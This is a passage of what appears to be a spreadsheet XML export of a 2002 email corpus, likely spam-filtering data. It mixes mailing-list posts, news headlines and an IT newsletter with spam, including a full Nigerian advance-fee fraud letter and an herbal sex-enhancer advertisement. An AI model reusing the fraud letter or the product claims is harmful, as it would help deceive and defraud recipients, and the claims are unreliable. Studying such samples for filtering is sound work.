   &lt;/table&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_43A60B_01C26E20.8F5BC480--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Robert" == Robert Elz wrote:
   Robert&gt; That (the way I have it configured, and it sounds as if
   Robert&gt; the way Tony does too) just does a move (rather than
   Robert&gt; select as target without moving).
 Ah.  I had forgotten that was settable.  
 Preferences, Folder Display, "Action when Target Button
 clicked..." set to "Select only" will change it.  I seem to
 recall that the button that is used as "Target button" is
 configurable but I haven't had enough caffeine to recall where
 that is.
 --Hal
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 'Stay on to 70' call grows
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622126,215/
 Date: 2002-10-07T03:52:50+01:00
 *Money:* Pensions experts say tax lures should be used to raise retirement age.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Gene technique reveals human evolution
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8714366,1440/
 Date: Not supplied
 A method that could allow scientists to probe our ancestors' evolution over the 
 last 20,000 years passes its first test
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [DEJD] DesktopEngineer.com Headlines - $200 For The Best Submission
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a MIME message. If you are reading this text, you
 might want to consider changing to a mail reader that
 understands how to properly display MIME multipart messages.
 --Boundary-=_bcea19c9d6337c63081baf1d5ee3466aa
 Content-Type: multipart/alternative; charset = "iso-8859-1";
 	boundary="Boundary-=_sb73baa252922041f1e5a038a67575b2a2";
 --Boundary-=_sb73baa252922041f1e5a038a67575b2a2
 Content-Type: text/plain; charset = "iso-8859-1";
 Content-Transfer-Encoding: 8bit
 If you are seeing this message, please visit http://desktopengineer.com to see the latest stories.
 --Boundary-=_sb73baa252922041f1e5a038a67575b2a2
 Content-Type: text/html; charset = "iso-8859-1";
 Content-Transfer-Encoding: 8bit
 &lt;!DOCTYPE HTML PUBLIC "-//SoftQuad Software//DTD HoTMetaL PRO 6.0::19990601::extensions to HTML 4.0//EN" "hmpro6.dtd"&gt;
 &lt;HTML&gt; 
   &lt;HEAD&gt; 
 	 &lt;TITLE&gt;Desktop Engineers Junk Drawer - Handy Odds N Ends for Windows 98, NT
 		and 2000&lt;/TITLE&gt; &lt;META NAME="GeekLog" CONTENT="Created with GeekLog 1.5rc1"&gt;
 	 &lt;META HTTP-EQUIV="expires" CONTENT="60"&gt; &lt;STYLE TYPE="text/css"&gt;
 &lt;!--	
 BODY, TD	{ color: black; font-size: x-small; font-family: verdana, arial, sans-serif }
 H1 		{ color: black; font-size: medium; font-weight: bold; font-family: verdana, arial, sans-serif }
 H2 		{ color: black; font-size: small; font-weight: bold; font-family: verdana, arial, sans-serif }
 .blocktitle 	{ color: white; font-size: x-small; font-weight: bold; font-family: verdana, arial, sans-serif }
 .footer 	{ font-size: xx-small; font-family: verdana, arial, sans-serif }
 --&gt;
 &lt;/STYLE&gt; 
   &lt;/HEAD&gt; 
   &lt;BODY TEXT="#000000" BGCOLOR="#FFFFFF" LINK="#333333" VLINK="#333333"
 	ALINK="#333333" LEFTMARGIN="0" TOPMARGIN="0"&gt;
 &lt;!-- begin header.tmpl --&gt;
 	 &lt;TABLE BORDER="0" WIDTH="630" ALIGN="LEFT" CELLSPACING="0" CELLPADDING="0"&gt;
 		&lt;TR ALIGN="right" VALIGN="middle"&gt; 
 		  &lt;TD COLSPAN="2" HEIGHT="18"&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR VALIGN="bottom"&gt; 
 		  &lt;TD COLSPAN="2" ALIGN="LEFT" WIDTH="630"&gt;&lt;A
 			 HREF="http://desktopengineer.com" TARGET="promo"&gt;&lt;IMG
 			 SRC="http://desktopengineer.com/images/deblue5.gif" HEIGHT="84" BORDER="0"
 			 ALT="http://desktopengineer.com" WIDTH="630"&gt;&lt;/A&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD COLSPAN="2" BGCOLOR="#000000"&gt;&lt;IMG
 			 SRC="http://desktopengineer.com/images/speck.gif" WIDTH="1" HEIGHT="1"
 			 ALT=""&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD COLSPAN="2" BGCOLOR="#AAAAAA"&gt;&lt;IMG
 			 SRC="http://desktopengineer.com/images/speck.gif" WIDTH="1" HEIGHT="6"
 			 ALT=""&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD COLSPAN="2" BGCOLOR="#FFFFFF"&gt;&lt;IMG
 			 SRC="http://desktopengineer.com/images/speck.gif" WIDTH="1" HEIGHT="1"
 			 ALT=""&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR BGCOLOR="#648DAD"&gt; 
 		  &lt;TD COLSPAN="2"&gt;&lt;B&gt;&lt;FONT COLOR="#333333"&gt;Desktop Engineer's Junk Drawer
 			 Headline Mailer!&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD COLSPAN="2" BGCOLOR="#AAAAAA" HEIGHT="6"&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD COLSPAN="2" BGCOLOR="#EEEEEE"&gt;&lt;SMALL&gt;To subscribe, send a blank
 			 email to: &lt;A
 			 HREF="mailto:dejdweekly-subscribe@topica.com"&gt;dejdweekly-subscribe@topica.com&lt;/A&gt;&lt;/SMALL&gt;&lt;/TD&gt;
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD COLSPAN="2"&gt; &lt;BR&gt; 
 			 &lt;TABLE CELLSPACING="0" CELLPADDING="1" WIDTH="500" BORDER="0"
 			 ALIGN="CENTER"&gt; 
 				&lt;TBODY&gt; 
 				  &lt;TR BGCOLOR="#304a63"&gt; 
 					 &lt;TD&gt; 
 						&lt;TABLE CELLSPACING="0" CELLPADDING="2" WIDTH="100%"
 						BORDER="0"&gt; 
 						  &lt;TBODY&gt; 
 							 &lt;TR BGCOLOR="#304a63"&gt; 
 								&lt;TD CLASS="blocktitle" COLSPAN="2"
 								ALIGN="CENTER"&gt;ADVERTISEMENT&lt;BR&gt;&lt;FONT COLOR="#FF0000"&gt; Discover the Powerful
 								  Repackaging Capabilities of AdminStudio&lt;/FONT&gt;&lt;/TD&gt; 
 							 &lt;/TR&gt; 
 							 &lt;TR&gt; 
 								&lt;TD BGCOLOR="#e9edf2" COLSPAN="2"&gt;Let InstallShield
 								  show you the easy process for converting packages to MSI by demonstrating an
 								  application conversion using AdminStudio 3. Get detailed explanations of many
 								  best practices, and don't miss the Q&amp;amp;A session afterwards. Register Now!
 								  &lt;A
 									HREF="http://www.installshield.com/0207/DesktopEngineer0723"&gt;http://www.installshield.com/0207/DesktopEngineer0723&lt;/A&gt;&lt;/TD&gt;
 							 &lt;/TR&gt; 
 						  &lt;/TBODY&gt; 
 						&lt;/TABLE&gt;&lt;/TD&gt; 
 				  &lt;/TR&gt; 
 				&lt;/TBODY&gt; 
 			 &lt;/TABLE&gt;&lt;BR&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD&gt;&lt;IMG SRC="http://desktopengineer.com/images/speck.gif" WIDTH="10"
 			 HEIGHT="1" ALT=""&gt;&lt;/TD&gt; 
 		  &lt;TD&gt; &lt;HR&gt;&lt;B&gt;DesktopEngineer.com Giving Away $200 Submission Of The
 			 Month Award&lt;/B&gt;&lt;BR&gt; Friday, July 12 2002 @ 07:41 AM EDT by Darwin_Sanoy&lt;BR&gt; 
 			 &lt;P&gt;How about a little cash to buy something really cool? Send us
 				those tips! &lt;/P&gt;
 			 &lt;A
 			  HREF="http://desktopengineer.com/article.php?story=20020718005048357"&gt;http://desktopengineer.com/article.php?story=20020718005048357&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;
 			 &lt;HR&gt;&lt;B&gt;Microsoft Webcast: WMIC: Managing Windows from a Command Line (07/24/02
 			 @ 10am PST)&lt;/B&gt;&lt;BR&gt; Thursday, July 11 2002 @ 11:22 AM EDT by Darwin_Sanoy&lt;BR&gt; 
 			 &lt;P&gt;WMI is the powerful management API Microsoft built into Windows
 				2000. Getting scripted access to this management functionality can not be done
 				through shell scripts - until WMIC was released with XP. &lt;/P&gt;
 			 &lt;A
 			  HREF="http://desktopengineer.com/article.php?story=20020718002155930"&gt;http://desktopengineer.com/article.php?story=20020718002155930&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;
 			 &lt;HR&gt; 
 			 &lt;P ALIGN="CENTER"&gt;
 				&lt;A
 				 HREF="http://desktopengineer.com/cgi-bin/ads/adclick.cgi?manager=adcycle.com&amp;gid=1&amp;cid=26&amp;mid=84&amp;id=472"
 				 TARGET="_blank"&gt;&lt;IMG
 				SRC="http://desktopengineer.com/cgi-bin/ads/adcycle.cgi?gid=1&amp;cid=26&amp;mid=84&amp;id=472"
 				WIDTH="468" HEIGHT="60" BORDER="0" ALT="Click to Visit InstallShield"&gt;&lt;/A&gt;&lt;/P&gt;
 			 &lt;HR&gt;&lt;B&gt;Wise Black Belt Series: Application Isolation Webinar&lt;/B&gt;&lt;BR&gt; Wednesday,
 			 July 10 2002 @ 06:12 AM EDT by Darwin_Sanoy&lt;BR&gt; 
 			 &lt;P&gt;&lt;B&gt;Session: Application Isolation and Windows Installer&lt;/B&gt; This
 				webinar covered how .LOCAL and .NET (Manifests) isolation work. Webinar
 				included demonstrations of both isolation technologies for traditional
 				applications. &lt;/P&gt;
 			 &lt;A
 			  HREF="http://desktopengineer.com/article.php?story=2002071415404212"&gt;http://desktopengineer.com/article.php?story=2002071415404212&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;
 			 &lt;HR&gt;&lt;B&gt;Nice Linksys 4 Port USB Mini-Hub for $11.65 at Buy.com&lt;/B&gt;&lt;BR&gt; Tuesday,
 			 July 09 2002 @ 07:55 AM EDT by Darwin_Sanoy&lt;BR&gt; 
 			 &lt;P&gt;This is a great prices for four ports! &lt;/P&gt;
 			 &lt;A
 			  HREF="http://desktopengineer.com/article.php?story=20020718005709995"&gt;http://desktopengineer.com/article.php?story=20020718005709995&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;HR&gt;
 			 &lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD COLSPAN="2"&gt; &lt;BR&gt; 
 			 &lt;TABLE CELLSPACING="0" CELLPADDING="1" WIDTH="500" BORDER="0"
 			  ALIGN="CENTER"&gt; 
 				&lt;TBODY&gt; 
 				  &lt;TR BGCOLOR="#304a63"&gt; 
 					 &lt;TD&gt; 
 						&lt;TABLE CELLSPACING="0" CELLPADDING="2" WIDTH="100%"
 						 BORDER="0"&gt; 
 						  &lt;TBODY&gt; 
 							 &lt;TR BGCOLOR="#304a63"&gt; 
 								&lt;TD CLASS="blocktitle" COLSPAN="2"
 								 ALIGN="CENTER"&gt;ADVERTISEMENT&lt;BR&gt;&lt;FONT COLOR="#FF0000"&gt; Discover the Powerful
 								  Repackaging Capabilities of AdminStudio&lt;/FONT&gt;&lt;/TD&gt; 
 							 &lt;/TR&gt; 
 							 &lt;TR&gt; 
 								&lt;TD BGCOLOR="#e9edf2" COLSPAN="2"&gt;Let InstallShield
 								  show you the easy process for converting packages to MSI by demonstrating an
 								  application conversion using AdminStudio 3. Get detailed explanations of many
 								  best practices, and don't miss the Q&amp;amp;A session afterwards. Register Now!
 								  &lt;A
 								  HREF="http://www.installshield.com/0207/DesktopEngineer0723"&gt;http://www.installshield.com/0207/DesktopEngineer0723&lt;/A&gt;&lt;/TD&gt;
 							 &lt;/TR&gt; 
 						  &lt;/TBODY&gt; 
 						&lt;/TABLE&gt;&lt;/TD&gt; 
 				  &lt;/TR&gt; 
 				&lt;/TBODY&gt; 
 			 &lt;/TABLE&gt;&lt;BR&gt; &lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD BGCOLOR="#000000" COLSPAN="2"&gt;&lt;IMG
 			 SRC="http://desktopengineer.com/images/speck.gif" WIDTH="1" HEIGHT="1"
 			 ALT=""&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD BGCOLOR="#AAAAAA" COLSPAN="2"&gt;&lt;IMG
 			 SRC="http://desktopengineer.com/images/speck.gif" WIDTH="1" HEIGHT="6"
 			 ALT=""&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD BGCOLOR="#EEEEEE" COLSPAN="2"&gt;&lt;IMG
 			 SRC="http://desktopengineer.com/images/speck.gif" WIDTH="1" HEIGHT="1"
 			 ALT=""&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR BGCOLOR="#648DAD" VALIGN="top"&gt; 
 		  &lt;TD HEIGHT="20" CLASS="footer" COLSPAN="2"&gt;&amp;nbsp;Copyright &amp;copy; 2002
 			 Desktop Engineers Junk Drawer, ISSN: 1522-7693&lt;BR&gt; &amp;nbsp;All trademarks and
 			 copyrights on this page are owned by their respective owners.&lt;/TD&gt; 
 		&lt;/TR&gt; 
 		&lt;TR&gt; 
 		  &lt;TD BGCOLOR="#AAAAAA" COLSPAN="2"&gt;&lt;IMG
 			 SRC="http://desktopengineer.com/images/speck.gif" WIDTH="1" HEIGHT="1"
 			 ALT=""&gt;&lt;/TD&gt; 
 		&lt;/TR&gt; 
 	 &lt;/TABLE&gt; &lt;/BODY&gt;
 &lt;/HTML&gt;
 --Boundary-=_sb73baa252922041f1e5a038a67575b2a2--
 --Boundary-=_bcea19c9d6337c63081baf1d5ee3466aa--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YOUR ANTICIPATED ASSISTANT IS REQUIRED.
</t>
  </si>
  <si>
    <t xml:space="preserve">I am Mr.IKE EJOH. Bank Manager of Diamond Bank of Nigeria, Lagos Branch. I have urgent and very confidential business proposal for you. On June 6  1999 a FOREIGN Oil consultant/contractor with the FEDERAL MINISTRY OF AVIATIONMr. Barry Kelly made a numbered time (Fixed) Deposit for twelve calendar months, valued at US$25,000,000.00 (Twenty- five Million Dollars) in my branch. Upon maturity, I sent a routine notification to his forwarding address but got no reply. After a month, we sent a reminder and finally we discovered from his  employers, the FEDERAL MINISTRY OF AVIATION that Mr. Barry Kelly died from an automobile accident. On further investigation, I found out that he died without making a WILL, and all attempts to trace his next of kin was fruitless. I therefore made further investigation and discovered that Mr. Barry Kelly did not declare any kin or relations in all his official documents, including his Bank Deposit paperwork in my Bank.This sum of US$25,000,000.00 is still sitting in my Bank and the interest is being rolled over with the principal sum at the end of each year. No one willever come forward to claim it.According to Nigerian Law, at the expiration of 6 (six) years, the money will revert to the ownership of the Nigerian Government if nobody applies to claim the fund. Consequently, i have just sucided in getting this fund sent to holland through a security company called GLOBAL&amp; BASIC FINANCIAL COMPANY., I will like you to provide immediately your full names and address so that i will prepare the necessary documents and affidavits, which will put you in place as the owner of this fund in the security company. i shall employ the service of an Attorney for drafting and notarization of the changes  and to obtain the necessary documents and letter of probate &amp; administration in your favour. There is no risk at all as all the paperwork for this transaction will be done by the Attorney and my position as the Bran
 ch Manager guarantees the successful execution of this transaction. If you are interested, please replyimmediately via the private email address . Upon your response, I shall then provide you with more details and relevant documents that will help you understand the transaction. Please observe utmost confidentiality, and be rest assured that this transaction would be most profitable for both of us because I shall require your assistance to invest my share in your country.
 Awaiting your urgent reply via my email: 
 Thanks and regards. 
 MR.IKE EJOH
</t>
  </si>
  <si>
    <t xml:space="preserve">----- Original Message -----
 From: "James Rogers" &lt;jamesr@best.com&gt;
 &gt; As I've said before, American
 &gt; Indian Reservations are quite possibly the only place on the planet where
 &gt; you can find trailer park shantytowns where every household is bringing in
 a
 &gt; six-figure income.  I wish I could be exploited like that.
 Got bits?
 (and I bet you probably /are/ being exploited, but you just don't know by
 whom...)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tibetans see hint of detente with China
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418827,215/
 Date: 2002-10-01T04:33:57+01:00
 *World latest:* Dalai Lama's envoy hails first contact in 20 years.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Hayes Accura ISDN PCI
</t>
  </si>
  <si>
    <t xml:space="preserve">Does anyone know if this is supported under 2.4.18 kernels or higher?
 I need to buy an ISDN TA quick, and PC World have these in stock for 65.
 Thanks,
 	David.
 David Hamilton
 Senior Technical Consultant
 HP Ireland 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">R. A. Hettinga:
 &gt;Church, AA, same diff?
 It's difficult to measure which is the greater
 liability in a potential mate, religiosity or
 alcoholism.
 _________________________________________________________________
 Join the worlds largest e-mail service with MSN Hotmail. 
 http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Magic Drugs: No Prescription Required                  IIWMJW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</si>
  <si>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&lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"423" height=3D"166" bgcolor=3D"#800080"&gt;
   &lt;tr&gt;
     &lt;td width=3D"464" height=3D"160"&gt;
 &lt;table border=3D"0" width=3D"100%" height=3D"110" bordercolor=3D"#FFFF99" =
 bgcolor=3D"#FFFF00"&gt;
   &lt;tr&gt;
     &lt;td width=3D"514" height=3D"22" bgcolor=3D"#FFFF99" align=3D"center"&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" color=3D"#FF0000" size=3D"2"&gt;NEW! -&amp;gt;&lt;/font=
 &gt;&lt;font face=3D"Verdana" color=3D"#FF0000" size=3D"3"&gt;
 Vigoral Herbal Love Enhancers &lt;/font&gt;&lt;font face=3D"Verdana" color=3D"#FF00=
 00" size=3D"2"&gt;&amp;lt;- NEW!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width=3D"514" height=3D"82" bgcolor=3D"#800080" align=3D"center"&gt;
 &lt;b&gt;&lt;font face=3D"Times New Roman" size=3D"3" color=3D"#FFFFCC"&gt;Straight fr=
 om our lab to you!&lt;/font&gt;&lt;/b&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;br&gt;
 &lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFFFF"&gt;We Now Offer &lt;/font&gt;=
 &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFFFF"&gt;3
 NEW - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFFCC"&gt;Special=
 ly Formulated
 &amp;amp; 100% Natural&lt;/font&gt;&lt;/i&gt;&lt;font color=3D"#FFFFFF" face=3D"Tahoma" size=3D=
 "2"&gt; - products to help stimulate your moments with that special someone f=
 or&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFF99"&gt;
 &lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFF99" size=3D"3"&gt;Only
 $24.99!&lt;/font&gt;&lt;/b&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"460" height=3D"78"&gt;
   &lt;tr&gt;
     &lt;td width=3D"521" height=3D"72" bgcolor=3D"#CC0066" align=3D"center" s=
 tyle=3D"border-bottom-style: solid; border-bottom-color: #FFFF99"&gt;
 &lt;p&gt;&lt;font size=3D"2"&gt;&lt;i&gt;&lt;b&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF"&gt;&amp;quot;Th=
 e Most
 Exciting Love
 Making Experience We've Ever Had!&lt;br&gt; Vigoral is #1, Hands Down!&amp;quot;&lt;/fo=
 nt&gt;&lt;font color=3D"#FFFF99"&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;=
 nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nb=
 sp;
 &amp;nbsp;&amp;nbsp;
 &lt;font face=3D"Tahoma"&gt;- Ricardo &amp;amp; Isabelle P. of Las Vegas, NV&lt;/font&gt;&lt;=
 /font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
       &lt;table border=3D"0" width=3D"460" height=3D"106" bgcolor=3D"#800080"=
  bordercolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"34%" height=3D"100" bordercolor=3D"#FFFF99"&gt;
             &lt;div align=3D"center"&gt;
               &lt;center&gt;
               &lt;table border=3D"1" width=3D"139" height=3D"84" bordercolor=3D=
 "#FFFFFF"&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"131" height=3D"81" bgcolor=3D"#000080" alig=
 n=3D"center"&gt;&lt;font color=3D"#FFFFFF" size=3D"5" face=3D"Impact"&gt;&lt;i&gt;SUPER&lt;/=
 i&gt;&lt;/font&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"5" face=3D"Tahoma"&gt;
                     Vigoral&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;i&gt;&lt;b&gt;&lt;font face=3D"Verdana" siz=
 e=3D"2" color=3D"#FFFF00"&gt;For
                     Men&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;/center&gt;
             &lt;/div&gt;
           &lt;/td&gt;
           &lt;td width=3D"33%" height=3D"100" align=3D"center"&gt;
             &lt;div align=3D"center"&gt;
               &lt;center&gt;
               &lt;table border=3D"1" width=3D"136" bgcolor=3D"#CCCCFF" height=
 =3D"81" bordercolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"138" align=3D"center" height=3D"77"&gt;&lt;font c=
 olor=3D"#FF00FF"&gt;&lt;i&gt;&lt;font size=3D"5" face=3D"Impact"&gt;SUPER&lt;/font&gt;&lt;/i&gt;&lt;/fon=
 t&gt;&lt;b&gt;&lt;font size=3D"5" color=3D"#FF00FF"&gt;&lt;font face=3D"Tahoma" size=3D"5"&gt;
                     &lt;/font&gt;&lt;font face=3D"Tahoma"&gt;
                     Vigorette&lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5=
 " color=3D"#990099"&gt;&lt;br&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"2" color=3D=
 "#9966FF"&gt;For
                     Women&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;/center&gt;
             &lt;/div&gt;
           &lt;/td&gt;
           &lt;td width=3D"33%" height=3D"100"&gt;
             &lt;div align=3D"center"&gt;
               &lt;center&gt;
               &lt;table border=3D"1" width=3D"134" bgcolor=3D"#CC0066" height=
 =3D"83" bordercolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"126" height=3D"79" align=3D"center" bgcolor=
 =3D"#CC0066"&gt;&lt;font size=3D"5" color=3D"#FFFFCC"&gt;&lt;i&gt;&lt;font face=3D"Impact"&gt;S=
 UPER&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" color=3D"#CC6699" size=3D"5=
 "&gt;
                     &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D"#FFFF=
 CC"&gt;Vigorgel&lt;/font&gt;&lt;font color=3D"#990099" face=3D"Tahoma" size=3D"5"&gt;&lt;br&gt;=
 &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;For
                     Everyone!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;/center&gt;
             &lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 &lt;table border=3D"0" width=3D"100%" bgcolor=3D"#FFFF99" height=3D"62"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" align=3D"center" height=3D"29" bgcolor=3D"#800080"&gt;=
 &lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;All
       Only &lt;u&gt; $24.99&lt;/u&gt; each &amp;amp; Get FREE Shipping!*&lt;br&gt;&lt;/font&gt;&lt;font f=
 ace=3D"Verdana" color=3D"#FFFFFF" size=3D"2"&gt;-LIMITED
       TIME OFFER-&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" align=3D"center" height=3D"29" bgcolor=3D"#FFFF99"&gt;=
 &lt;b&gt;&lt;u&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FF0000"&gt;&lt;a style=3D"color=
 : #FF0000"&gt;-&amp;gt;
       &lt;/a&gt;&lt;a href=3D"http://www.mailcomesandgoes.com" style=3D"color: #FF0=
 000; text-decoration: underline"&gt;CLICK
       HERE TO ORDER NOW! &amp;lt;-&lt;/a&gt;&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;/p&gt;
 &lt;table border=3D"0" width=3D"470" bgcolor=3D"#800080" height=3D"68"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" align=3D"center" height=3D"64"&gt;&lt;font face=3D"Arial"=
  size=3D"1" color=3D"#FFFFFF"&gt;Your
       email address was obtained from an opt-in list, Opt-in MRSA List &lt;br=
 &gt; &amp;nbsp;Purchase
       Code # 248-3-550.&amp;nbsp;&amp;nbsp;If you wish to be unsubscribed from thi=
 s list, please
       &lt;a href=3D"mailto:print5@btamail.net.cn?Subject=3DUnsubcribe Immedia=
 tely" style=3D"color: #FFFFCC"&gt;Click
       here&lt;/a&gt; and press send to be removed. If you have previously
       unsubscribed and are still receiving this message, you may email our=
  &lt;a href=3D"mailto:sortofridiculous@bigfoot.com?Subject=3DAbuse Report" st=
 yle=3D"color: #FFFFCC"&gt;Abuse
       Control Center&lt;/a&gt;. We do not condone spam in any shape or form. Tha=
 nk You
       kindly for your cooperation&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font face=3D"Arial" size=3D"1" color=3D"#9966FF"&gt;*Note: free shipping =
 on orders of
 three or more of any product.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Comrade Communism (was Re: Crony Capitalism (was RE: sed
</t>
  </si>
  <si>
    <t xml:space="preserve">First, misattribution.  I did not write the blurb below.  I made one
 statement about VP Cheney only, to wit, that he has a short memory.
 I couldn't agree with you more on this: "in short, then, economics is not a
 zero sum game, property is not theft, the rich don't get rich off the backs
 of the poor, and redistributionist labor "theory" of value happy horseshit
 is just that: horseshit, happy or otherwise," however, I resent being lumped
 in a zero-sum-zealot category for suggesting nothing more than that rich and
 successful at face value is apropos of nothing and I am beginning to
 understand that people who immediately and so fiercely object to my ad
 hominem (re Cheney) align themselves weird sylogisms like "if rich then
 deservedly" or "if rich then smarter."  Given that, I am also beginning to
 understand why some people NEED to be rich.
 WRT to meritocracies - all hail, meritocracies!  WRT Harvard: over 90% of
 2002 graduates were cum laude +. INTERESTING curve.  Those eager to be
 measured got their wish; those unwashed shy folk who just live it provide
 the balast.
 Speaking of Forbes, was reading about Peter Norton just today in an old
 issue while waiting for my doctor.  Norton attributes his success to LUCK.
 Imagine.
 Geege
 -----Original Message-----
 From: R. A. Hettinga [mailto:rah@shipwright.com]
 Sent: Sunday, September 22, 2002 10:01 PM
 To: Geege Schuman; Owen Byrne
 Cc: Gary Lawrence Murphy; Mr. FoRK; fork@example.com; Digital Bearer
 Settlement List
 Subject: Comrade Communism (was Re: Crony Capitalism (was RE: sed
 /s/United States/Roman Empire/g))
 -----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 At 11:15 AM -0400 on 9/22/02, Geege Schuman wrote:
 &gt; Most of them seem to have Ivy League educations, or are Ivy League
 &gt; dropouts suggesting to me that they weren't exactly poor to start
 &gt; with.
 Actually, if I remember correctly from discussion of the list's
 composition in Forbes about five or six years ago, the *best* way to
 get on the Forbes 400 is to have *no* college at all. Can you say
 "Bootstraps", boys and girls? I knew you could...
 [Given that an undergraduate liberal arts degree from a state school,
 like, say, mine, :-), is nothing but stuff they should have taught
 you in a government-run "high" school, you'll probably get more of
 *those* on the Forbes 400 as well as time goes on. If we ever get
